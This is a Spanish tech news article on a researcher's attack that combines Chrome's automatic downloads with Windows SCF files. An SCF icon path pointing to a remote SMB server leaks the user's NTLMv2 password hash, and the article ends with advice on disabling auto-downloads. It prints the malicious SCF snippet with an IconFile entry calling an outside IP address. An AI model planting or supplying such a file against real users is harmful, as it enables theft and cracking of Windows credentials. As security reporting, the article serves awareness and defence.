Combinación de dos técnicas que resultan en el robo de tu contraseña

Ha sido un investigador de seguridad serbio llamado Bosko Stankovic que ha utilizado dos técnicas ya conocidas para conseguir robar la contraseña de acceso a Windows a través de Google Chrome y el famoso protocolo SMB, del cual se aprovecha el ransomware WannaCry. El proceso para explotar esta vulnerabilidad es relativamente sencillo, y de momento no hay ningún parche que lo solucione.

En concreto, el ataque se realiza con una mezcla de dos técnicas diferentes; una de ellas obtenida del gusano Stuxnet, y otra de un método presentado en la conferencia Black Hat de 2015 que permitía hacer ataques a través de Internet.

Por defecto, Chrome descarga automáticamente los archivos que considera seguros sin que pregunte al usuario si quiere descargarlos. Normalmente, incluso si un archivo pasa este primer control, el usuario ha de ejecutarlo manualmente. Por desgracia, esto no es infalible, y Stankovic consiguió crear un archivo que se ejecutara automáticamente al ser descargado con Chrome.

Este archivo estaba en formato SCF (Shell Command File), que permiten ejecutar un número limitado de comandos. Estos existen desde Windows 98, y se utilizaba hasta Windows XP como acceso directo para mostrar el escritorio. Básicamente, es un archivo de texto con secciones que determinan qué comando se va a ejecutar, así como la ubicación de un icono.

Al igual que ocurre con los accesos directos a archivos LNK, la ubicación de los iconos se resuelve automáticamente cuando el archivo se muestra en el Explorador de Archivos. Lo que Stankovic hizo fue cambiar esa ubicación a un servidor SMB remoto, mostrando la segunda línea en lugar de lo que se mostraría en la primera.

Normal

[Shell]
Command=2
IconFile=explorer.exe,3

Ataque

[Shell]
IconFile=\\170.170.170.170\icon

Cómo evitar que roben nuestra contraseña de Windows

Así, al abrir en el explorador de archivos la carpeta de descarga, al cargarse el icono del archivo , se llama en su lugar automáticamente al servidor, sin ni siquiera hacer click en el archivo. El servidor remoto del atacante está entonces en disposición de capturar el nombre de usuario y el hash NTLMv2 de la contraseña para crackearla posteriormente, o utilizar el hash para otros servicios de Microsoft como Outlook, Xbox Live o Skype si tenemos puesto nuestro email para acceder a Windows en lugar de tener una cuenta local.

Lo peligroso de los archivos SCF es que éstos no muestran su formato ni aunque lo tengamos activado. Así, un archivo que se llame “foto.jpg.scf” se verá como “foto.jpg” a ojos del usuario.

Para evitar este tipo de ataques, tenemos que desactivar la descarga automática de archivos en Chrome, yendo a Configuración – Ajustes – Mostrar configuración avanzada – Descargas. Ahí, deberemos marcar la pestaña de Preguntar dónde se guardará cada archivo antes de descargarlo. Gracias a eso, evitaremos descargas de archivos no deseados que puedan infectarnos, con un método que funciona incluso en las versiones más actualizadas de Windows y Chrome, y que permitirían realizar ataques de escalada de permisos. Está en manos de Google parchear este fallo.

 

Fuente: DefenseCode | adslzone